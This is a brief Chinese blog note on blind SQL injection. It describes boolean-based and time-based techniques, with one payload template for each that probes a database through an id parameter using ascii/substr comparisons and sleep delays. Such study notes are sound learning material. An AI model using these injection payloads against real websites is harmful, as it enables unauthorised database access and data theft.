盲注

盲注背景:页面没有报错回显,不知道数据库具体的返回值

1、布尔盲注:
使用情况:页面显示真假两种情况

? id=1' and ascii(substr(select查询语句)1,1)>100 --+

2、时间盲注
使用情况:页面没有任何回显

? id=1' and if(ascii(substr(select查询语句)1,1)>100,sleep(0),sleep(3)) --+

本文作者:ugnfc

本文链接:https://www.cnblogs.com/ugnfc/p/18153525

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   ugnfc  阅读(9)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
💬
评论
📌
收藏
💗
关注
👍
推荐
🚀
回顶
收起
  1. 1 404 not found REOL
404 not found - REOL
00:00 / 00:00
An audio error has occurred.